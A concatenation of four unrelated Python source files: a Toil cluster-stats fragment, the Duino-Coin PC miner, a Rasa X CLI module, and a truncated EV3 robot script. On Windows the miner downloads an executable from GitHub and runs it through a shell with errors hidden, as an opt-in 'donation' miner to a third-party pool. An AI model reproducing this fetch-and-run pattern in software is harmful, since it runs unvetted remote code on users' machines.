elif totalNodes < len(self.scaler.provisioner.getStaticNodes(preemptable)): # ignore static nodes
raise RuntimeError('Provisioner incorrectly terminated statically provisioned nodes.')
class ClusterStats(object):
def __init__(self, path, batchSystem, clusterName):
logger.debug("Initializing cluster statistics")
self.stats = {}
self.statsThreads = []
self.statsPath = path
self.stop = False
self.clusterName = clusterName
self.batchSystem = batchSystem
self.scaleable = isinstance(self.batchSystem, AbstractScalableBatchSystem) if batchSystem else False
def shutDownStats(self):
if self.stop:
return
def getFileName():
extension = '.json'
file = '%s-stats' % self.clusterName
counter = 0
while True:
suffix = str(counter).zfill(3) + extension
fullName = os.path.join(self.statsPath, file + suffix)
if not os.path.exists(fullName):
return fullName
counter += 1
if self.statsPath and self.scaleable:
self.stop = True
for thread in self.statsThreads:
thread.join()
fileName = getFileName()
with open(fileName, 'w') as f:
json.dump(self.stats, f)
def startStats(self, preemptable):
thread = ExceptionalThread(target=self._gatherStats, args=[preemptable])
thread.start()
self.statsThreads.append(thread)
def checkStats(self):
for thread in self.statsThreads:
# propagate any errors raised in the threads execution
thread.join(timeout=0)
def _gatherStats(self, preemptable):
def toDict(nodeInfo):
# convert NodeInfo object to dict to improve JSON output
return dict(memory=nodeInfo.memoryUsed,
cores=nodeInfo.coresUsed,
memoryTotal=nodeInfo.memoryTotal,
coresTotal=nodeInfo.coresTotal,
requestedCores=nodeInfo.requestedCores,
requestedMemory=nodeInfo.requestedMemory,
workers=nodeInfo.workers,
time=time.time() # add time stamp
)
if self.scaleable:
logger.debug("Staring to gather statistics")
stats = {}
try:
while not self.stop:
nodeInfo = self.batchSystem.getNodes(preemptable)
for nodeIP in nodeInfo.keys():
nodeStats = nodeInfo[nodeIP]
if nodeStats is not None:
nodeStats = toDict(nodeStats)
try:
# if the node is already registered update the dictionary with
# the newly reported stats
stats[nodeIP].append(nodeStats)
except KeyError:
# create a new entry for the node
stats[nodeIP] = [nodeStats]
time.sleep(60)
finally:
threadName = 'Preemptable' if preemptable else 'Non-preemptable'
logger.debug('%s provisioner stats thread shut down successfully.', threadName)
self.stats[threadName] = stats
else:
pass
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python Miner (v1.8)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2020
##########################################
import socket, statistics, threading, time, re, subprocess, hashlib, platform, getpass, configparser, sys, datetime, os # Import libraries
from pathlib import Path
from signal import signal, SIGINT
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
try: # Check if cpuinfo is installed
import cpuinfo
from multiprocessing import freeze_support
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Cpuinfo is not installed. Miner will try to install it. If it fails, please install it using: python3 -m pip install py-cpuinfo.\nIf you can't install it, use Minimal-PC_Miner.")
install("py-cpuinfo")
os.execl(sys.executable, sys.executable, *sys.argv)
try: # Check if colorama is installed
from colorama import init, Fore, Back, Style
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Colorama is not installed. Miner will try to install it. If it fails, please install it using: python3 -m pip install colorama.\nIf you can't install it, use Minimal-PC_Miner.")
install("colorama")
os.execl(sys.executable, sys.executable, *sys.argv)
try: # Check if requests is installed
import requests
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Requests is not installed. Miner will try to install it. If it fails, please install it using: python3 -m pip install requests.\nIf you can't install it, use Minimal-PC_Miner.")
install("requests")
os.execl(sys.executable, sys.executable, *sys.argv)
# Global variables
minerVersion = "1.8" # Version number
timeout = 5 # Socket timeout
resources = "PCMiner_"+str(minerVersion)+"_resources"
shares = [0, 0]
diff = 0
last_hash_count = 0
khash_count = 0
hash_count = 0
hash_mean = []
donatorrunning = False
debug = False
serveripfile = "https://raw.githubusercontent.com/revoxhere/duino-coin/gh-pages/serverip.txt" # Serverip file
config = configparser.ConfigParser()
autorestart = 0
donationlevel = 0
platform = str(platform.system()) + " " + str(platform.release()) # Platform information
freeze_support() # If not used, pyinstaller hangs when checking cpuinfo
cpu = cpuinfo.get_cpu_info() # Processor info
try:
os.mkdir(str(resources)) # Create resources folder if it doesn't exist
except:
pass
def debugOutput(text):
if debug == "True":
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
if os.name == 'nt':
os.system("title "+title)
else:
print('\33]0;'+title+'\a', end='')
sys.stdout.flush()
def handler(signal_received, frame): # If CTRL+C or SIGINT received, send CLOSE request to server in order to exit gracefully.
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "\n%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " SIGINT detected - Exiting gracefully." + Style.NORMAL + Fore.WHITE + " See you soon!")
try:
soc.send(bytes("CLOSE", encoding="utf8")) # Try sending a close connection request to the server
except:
if debug == "True": raise
os._exit(0)
signal(SIGINT, handler) # Enable signal handler
def Greeting(): # Greeting message depending on time
global autorestart, greeting
print(Style.RESET_ALL)
if float(autorestart) <= 0:
autorestart = 0
autorestartmessage = "disabled"
if float(autorestart) > 0:
autorestartmessage = "every " + str(autorestart) + " minutes"
current_hour = time.strptime(time.ctime(time.time())).tm_hour
if current_hour < 12 :
greeting = "Have a wonderful morning"
elif current_hour == 12 :
greeting = "Have a tasty noon"
elif current_hour > 12 and current_hour < 18 :
greeting = "Have a peaceful afternoon"
elif current_hour >= 18 :
greeting = "Have a cozy evening"
else:
greeting = "Welcome back"
print(" > " + Fore.YELLOW + Style.BRIGHT + "Official Duino-Coin © Python Miner " + Style.RESET_ALL + Fore.WHITE + "(v" + str(minerVersion) + ") 2019-2020") # Startup message
print(" > " + Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
try:
print(" > " + Fore.WHITE + "CPU: " + Style.BRIGHT + Fore.YELLOW + str(cpu["brand_raw"]))
except:
if debug == "True": raise
if os.name == 'nt':
print(" > " + Fore.WHITE + "Donation level: " + Style.BRIGHT + Fore.YELLOW + str(donationlevel))
print(" > " + Fore.WHITE + "Algorithm: " + Style.BRIGHT + Fore.YELLOW + "DUCO-S1")
print(" > " + Fore.WHITE + "Autorestarter: " + Style.BRIGHT + Fore.YELLOW + str(autorestartmessage))
print(" > " + Fore.WHITE + str(greeting) + ", " + Style.BRIGHT + Fore.YELLOW + str(username) + "!\n")
if os.name == 'nt':
if not Path(str(resources) + "/Donate_executable.exe").is_file(): # Initial miner executable section
debugOutput("OS is Windows, downloading developer donation executable")
url = 'https://github.com/revoxhere/duino-coin/blob/useful-tools/PoT_auto.exe?raw=true'
r = requests.get(url)
with open(str(resources) + '/Donate_executable.exe', 'wb') as f:
f.write(r.content)
def hashrateCalculator(): # Hashes/sec calculation
global last_hash_count, hash_count, khash_count, hash_mean
last_hash_count = hash_count
khash_count = last_hash_count / 1000
hash_mean.append(khash_count) # Calculate average hashrate
khash_count = statistics.mean(hash_mean)
khash_count = round(khash_count, 2)
hash_count = 0 # Reset counter
threading.Timer(1.0, hashrateCalculator).start() # Run this def every 1s
def autorestarter(): # Autorestarter
time.sleep(float(autorestart)*60)
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Restarting the miner")
os.execl(sys.executable, sys.executable, *sys.argv)
def loadConfig(): # Config loading section
global username, efficiency, autorestart, donationlevel, debug
if not Path(str(resources) + "/Miner_config.cfg").is_file(): # Initial configuration section
print(Style.BRIGHT + "\nDuino-Coin basic configuration tool\nEdit "+str(resources) + "/Miner_config.cfg file later if you want to change it.")
print(Style.RESET_ALL + "Don't have an Duino-Coin account yet? Use " + Fore.YELLOW + "Wallet" + Fore.WHITE + " to register on server.\n")
username = input(Style.RESET_ALL + Fore.YELLOW + "Enter your username: " + Style.BRIGHT)
efficiency = input(Style.RESET_ALL + Fore.YELLOW + "Set mining intensity (1-100)% (recommended: 100): " + Style.BRIGHT)
autorestart = input(Style.RESET_ALL + Fore.YELLOW + "If you want, set after how many minutes miner will restart (recommended: 30): " + Style.BRIGHT)
donationlevel = "0"
if os.name == 'nt':
donationlevel = input(Style.RESET_ALL + Fore.YELLOW + "Set developer donation level (0-5) (recommended: 1), this will not reduce your earnings: " + Style.BRIGHT)
efficiency = re.sub("\D", "", efficiency) # Check wheter efficiency is correct
if float(efficiency) > int(100):
efficiency = 100
if float(efficiency) < int(1):
efficiency = 1
donationlevel = re.sub("\D", "", donationlevel) # Check wheter donationlevel is correct
if float(donationlevel) > int(5):
donationlevel = 5
if float(donationlevel) < int(0):
donationlevel = 0
config['miner'] = { # Format data
"username": username,
"efficiency": efficiency,
"autorestart": autorestart,
"donate": donationlevel,
"debug": False}
with open(str(resources) + "/Miner_config.cfg", "w") as configfile: # Write data to file
config.write(configfile)
efficiency = (100 - float(efficiency)) * 0.01 # Calulate efficiency for use with sleep function
print(Style.RESET_ALL + "Config saved! Launching...\n")
else: # If config already exists, load from it
config.read(str(resources) + "/Miner_config.cfg")
username = config["miner"]["username"]
efficiency = config["miner"]["efficiency"]
efficiency = (100 - float(efficiency)) * 0.01 # Calulate efficiency for use with sleep function
autorestart = config["miner"]["autorestart"]
donationlevel = config["miner"]["donate"]
debug = config["miner"]["debug"]
def Connect(): # Connect to pool section
global soc, pool_address, pool_port
res = requests.get(serveripfile, data = None) #Use request to grab data from raw github file
if res.status_code == 200: #Check for response
content = res.content.decode().splitlines() #Read content and split into lines
pool_address = content[0] #Line 1 = pool address
pool_port = content[1] #Line 2 = pool port
debugOutput("Retrieved pool IP: " + pool_address + ":" + str(pool_port))
try: # Shutdown previous connections if any
soc.shutdown(socket.SHUT_RDWR)
soc.close()
except:
debugOutput("No previous connections to close")
try: # Try to connect
soc = socket.socket()
soc.connect((str(pool_address), int(pool_port)))
soc.settimeout(timeout)
except: # If it wasn't, display a message
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Connection error! Retrying in 15s.")
if debug == "True": raise
time.sleep(15)
Connect()
def checkVersion():
serverVersion = soc.recv(1024).decode() # Check server version
debugOutput("Server version: " + serverVersion)
if float(serverVersion) <= float(minerVersion) and len(serverVersion) == 3: # If miner is up-to-date, display a message and continue
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.YELLOW + " Connected" + Style.RESET_ALL + Fore.WHITE + " to master Duino-Coin server (v"+str(serverVersion)+")")
else:
now = datetime.datetime.now()
cont = input(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Miner is outdated (v"+minerVersion+")," + Style.RESET_ALL + Fore.RED + " server is on v"+serverVersion+", please download latest version from https://github.com/revoxhere/duino-coin/releases/ or type \'continue\' if you wish to continue anyway.\n")
if cont != "continue":
os._exit(1)
def Mine(): # Mining section
global last_hash_count, hash_count, khash_count, donationlevel, donatorrunning, efficiency
if os.name == 'nt' and donatorrunning == False:
cmd = str(resources) + "/Donate_executable.exe -o stratum+tcp://xmg.minerclaim.net:3333 -o revox.donate -p x -e "
if int(donationlevel) == 5: cmd += "100"
elif int(donationlevel) == 4: cmd += "75"
elif int(donationlevel) == 3: cmd += "50"
elif int(donationlevel) == 2: cmd += "25"
elif int(donationlevel) == 1: cmd += "10"
if int(donationlevel) > 0: # Launch CMD as subprocess
debugOutput("Starting donation process")
donatorrunning = True
subprocess.Popen(cmd, shell=True, stderr=subprocess.DEVNULL)
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Thank You for being an awesome donator! <3")
else:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Duino-Coin network is a completely free service and will always be." + Style.BRIGHT + Fore.YELLOW + "\n You can help us maintain the server and low-fee payouts by donating.\n Visit " + Style.RESET_ALL + Fore.GREEN + "https://duinocoin.com/donate" + Style.BRIGHT + Fore.YELLOW + " to learn more.")
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Mining thread is starting" + Style.RESET_ALL + Fore.WHITE + " using DUCO-S1 algorithm with " + Fore.YELLOW + str(100-(100*int(efficiency))) + "% efficiency")
while True:
if float(efficiency) < 100: time.sleep(float(efficiency)) # Sleep to achieve lower efficiency if less than 100 selected
while True:
soc.send(bytes(f"JOB,{str(username)}", encoding="utf8")) # Send job request
job = soc.recv(1024).decode() # Get work from pool
job = job.split(",") # Split received data to job and difficulty
diff = job[2]
if job[0] and job[1] and job[2]:
debugOutput("Job received: " +str(job))
break # If job received, continue to hashing algo
computestart = datetime.datetime.now()
for ducos1res in range(100 * int(diff) + 1): # Loop from 1 too 100*diff)
ducos1 = hashlib.sha1(str(job[0] + str(ducos1res)).encode("utf-8")).hexdigest() # Generate hash
hash_count = hash_count + 1 # Increment hash counter
if job[1] == ducos1: # If result is even with job, send the result
debugOutput("Result found: " + str(ducos1res))
computestop = datetime.datetime.now()
while True:
try:
soc.send(bytes(f"{str(ducos1res)},{str(khash_count*1000)},Official Python Miner v{str(minerVersion)}", encoding="utf8")) # Send result of hashing algorithm to pool
feedback = soc.recv(1024).decode() # Get feedback
debugOutput("Feedback received: " + str(feedback))
except socket.timeout:
pass
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
if feedback == "GOOD": # If result was good
shares[0] += 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin Python Miner (v"+str(minerVersion)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Accepted " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "BLOCK": # If big block was found
shares[0] += 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin Python Miner (v"+str(minerVersion)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Block accepted ("+str(job[0])[:8]+") " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "INVU": # If this user doesn't exist server will forward earnings to developer account
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " User "+str(username)+" doesn't exist." + Style.RESET_ALL + Fore.RED + " Make sure you've entered the username correctly. Please check your config file. Exiting in 15s.")
time.sleep(15)
os._exit(1)
elif feedback == "ERR": # If this user doesn't exist server will forward earnings to developer account
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Internal server error." + Style.RESET_ALL + Fore.RED + " Retrying in 15s.")
time.sleep(15)
Connect()
else: # If result was bad
shares[1] += 1 # Share rejected = increment bad shares counter by 1
title("Duino-Coin Python Miner (v"+str(minerVersion)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.RED + " Rejected " + Fore.YELLOW + str(shares[1]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.RED + "(boo!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
break # Repeat
if __name__ == '__main__':
init(autoreset=True) # Enable colorama
hashrateCalculator() # Start hashrate calculator
title("Duino-Coin Python Miner (v"+str(minerVersion)+")")
try:
loadConfig() # Load configfile
debugOutput("Config file loaded")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error loading the configfile (Miner_config.cfg). Try removing it and re-running configuration. Exiting in 15s." + Style.RESET_ALL)
if debug == "True": raise
time.sleep(15)
os._exit(1)
try:
Greeting() # Display greeting message
debugOutput("Greeting displayed")
except:
if debug == "True": raise
while True:
try: # Setup autorestarter
if float(autorestart) > 0:
debugOutput("Enabled autorestarter for " + str(autorestart) + " minutes")
threading.Thread(target=autorestarter).start()
else:
debugOutput("Autorestarted is disabled")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error in autorestarter. Check configuration file (Miner_config.cfg). Exiting in 15s." + Style.RESET_ALL)
if debug == "True": raise
time.sleep(15)
os._exit(1)
try:
Connect() # Connect to pool
debugOutput("Connected to master server")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error connecting to the server. Retrying in 15s." + Style.RESET_ALL)
if debug == "True": raise
time.sleep(15)
Connect()
try:
checkVersion() # Check version
debugOutput("Version check complete")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error checking server version. Restarting." + Style.RESET_ALL)
if debug == "True": raise
Connect()
try:
debugOutput("Mining started")
Mine() # Launch mining thread
debugOutput("Mining ended")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error while mining. Restarting." + Style.RESET_ALL)
#if debug == "True": raise
raise
Connect()
time.sleep(0.025) # Restart
debugOutput("Restarting")
|
x.py
|
import argparse
import importlib.util
import logging
import signal
import sys
import os
import traceback
from multiprocessing import get_context
from typing import List, Text, Optional
import ruamel.yaml as yaml
from rasa.cli.utils import get_validated_path, print_warning, print_error
from rasa.cli.arguments import x as arguments
from rasa.constants import (
DEFAULT_ENDPOINTS_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_CONFIG_PATH,
DEFAULT_LOG_LEVEL_RASA_X,
)
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
DEFAULT_RASA_X_HOST = "http://localhost:5002"
DEFAULT_TRACKER_DB = "tracker.db"
# noinspection PyProtectedMember
def add_subparser(
subparsers: argparse._SubParsersAction, parents: List[argparse.ArgumentParser]
):
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace, endpoints: "AvailableEndpoints", rasa_x_url=None
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
from rasa.nlu.utils import configure_colored_logging
configure_colored_logging(args.loglevel)
logging.getLogger("apscheduler.executors.default").setLevel(logging.WARNING)
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url=None
) -> Text:
credentials_path = get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = io_utils.read_yaml_file(credentials_path)
else:
credentials = {}
# this makes sure the Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = io_utils.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
def _overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url):
from rasa.utils.endpoints import EndpointConfig
endpoints.model = EndpointConfig(
"{}/projects/default/models/tags/production".format(rasa_x_url),
token=rasa_x_token,
wait_time_between_pulls=2,
)
if not endpoints.tracker_store:
endpoints.tracker_store = EndpointConfig(type="sql", db=DEFAULT_TRACKER_DB)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
from rasa.core.utils import AvailableEndpoints
args.endpoints = get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
endpoints = AvailableEndpoints.read_endpoints(args.endpoints)
rasa_x_url = "{}/api".format(DEFAULT_RASA_X_HOST)
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(target=_rasa_service, args=(args, endpoints, rasa_x_url))
p.daemon = True
p.start()
return p
def is_rasa_x_installed():
"""Check if Rasa X is installed."""
# we could also do something like checking if `import rasax` works,
# the issue with that is that it actually does import the package and this
# takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length=16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
def _configure_logging(args):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
set_log_level(log_level)
configure_file_logging(log_level, args.log_file)
logging.basicConfig(level=log_level)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(project_path: Text):
mandatory_files = [DEFAULT_CONFIG_PATH, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import print_success, print_error, signal_handler
from rasa.core.utils import AvailableEndpoints
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
print_success("Starting Rasa X in production mode... 🚀")
args.endpoints = get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
endpoints = AvailableEndpoints.read_endpoints(args.endpoints)
_rasa_service(args, endpoints)
else:
if not is_rasa_x_installed():
print_error(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X."
)
sys.exit(1)
project_path = "."
if not is_rasa_project_setup(project_path):
print_error(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory."
)
sys.exit(1)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
# noinspection PyUnresolvedReferences
from rasax.community import local
local.check_license_and_metrics(args)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
try:
local.main(args, project_path, args.data, token=rasa_x_token)
except Exception:
print (traceback.format_exc())
print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
def _validate_domain(domain_path: Text):
from rasa.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
print_error("The provided domain file could not be loaded. Error: {}".format(e))
sys.exit(1)
|
Main.py
|
#!/usr/bin/env python3
print("Inicializando...", end=' \r')
import time
# from ev3dev.ev3 import *
print("ev3dev.ev3", end=' \r')
from ev3dev2.motor import OUTPUT_A, OUTPUT_B,OUTPUT_C, MoveTank,MoveSteering, SpeedPercent, LargeMotor
print("motores importados", end=' \r')
from ev3dev2.sensor.lego import ColorSensor,UltrasonicSensor
from ev3dev2.sensor import INPUT_4, INPUT_2, INPUT_3
print("Sensores importados", end=' \r')
from threading import Thread
from math import sqrt
import pickle
print("threading, math e pickle importados", end=' \r')
time.sleep(1)
print("Importacoes concluidas!", end=' \r')
#DECLARAÇÃO DE VARIAVEIS GLOBAIS
rodas=MoveTank(OUTPUT_A,OUTPUT_B)
curva=MoveSteering(OUTPUT_A,OUTPUT_B)
Mochila=LargeMotor(OUTPUT_C)
quads = []
orientacao = 0
# memoria_cor= {}
memoria_cor = {}
plaza=False
cor_atual=""
tentativa=0
c=""
mochila=False
velocidade=15
velocidadeFrente=30
cores = pickle.load(open("Cores.p", "rb"))
Sensor_direita = ColorSensor(INPUT_2)
Sensor_esquerda = ColorSensor(INPUT_4)
Sensor_Tras = ColorSensor(INPUT_1)
Sensor_direita.mode = Sensor_direita.MODE_RGB_RAW
Sensor_esquerda.mode = Sensor_esquerda.MODE_RGB_RAW
Sensor_Tras.mode = Sensor_Tras.MODE_RGB_RAW
Sensor_sonic = UltrasonicSensor(INPUT_3)
Sensor_sonic.mode=Sensor_sonic.MODE_US_DIST_CM
print("Declarando tudo!", end=' \r')
#FUNÇÔES DE LOCOMOÇÂO
def naocaiaRe():
global d
atualD = d[0]+d[1]+d[2]
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
if atualE< 40:
rodas.on(-SpeedPercent(velocidade-5), -SpeedPercent(velocidade))
if atualD<40:
rodas.on(-SpeedPercent(velocidade), -SpeedPercent(velocidade-5))
def retorno():#função para o retorno
global tentativa,c,cor_atual,velocidade
while c!=cor_atual:
naocaiaRe()
rodas.on(SpeedPercent(velocidade),SpeedPercent(velocidade))
if c!= 'White': Confirmar_cor(c)
#tempo para a parada no meio do quadrado
rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
#8 é o fator de tempo para ele voltar até o meio do quadrado, Se aumentar ele volta mais para tras
rodas.off()
tentativa+=1#indica que foi feita uma tentativa que falhou
procurar_proximo()#vira conforme as orientações que são possiveis
alinha(0.01,245,15)#anda um pouco a frente para nao o robo não reconhecer o mesmo ponto de referencia como um novo ponto
def naocaia_alinhar():
global d
atualD = d[0]+d[1]+d[2]
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
if(atualE<40):
rodas.on_for_rotations(20,0,0.30)
rodas.on_for_rotations(0,20,0.35)
rodas.on_for_rotations(-30,-30,0.25)
if(atualD<40):
rodas.on_for_rotations(0,20,0.30)
rodas.on_for_rotations(20,0,0.35)
rodas.on_for_rotations(-30,-30,0.25)
def alinha(Kp,target,margem):
global d
erroE=1
erroD=1
if c == 'White':
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
while c=='White' and atualE<280 :
rodas.on(15,15)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
rodas.off()
else:
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
while c!='White' and atualE<280:
rodas.on(-15,-15)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
rodas.off()
over=time.time()
while(erroE != 0 or erroD != 0) :
naocaia_alinhar();
atualD = d[0]+d[1]+d[2]
erroD=atualD - target
if abs(erroD)<margem:
erroD=0
outputD = erroD* (Kp+0.01)
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
erroE=atualE - target
if abs(erroE)<margem:
erroE=0
outputE = erroE* (Kp+0.008)
if outputE>40:
outputE = 40
elif outputE<-40:
outputE=-40
if outputD>40:
outputD = 40
if time.time()-over>10:
rodas.off()
erroE=0
erroD=0
if erroE == 0 and erroD == 0:
rodas.off()
else:
rodas.on(outputE,outputD)
while c!='White':
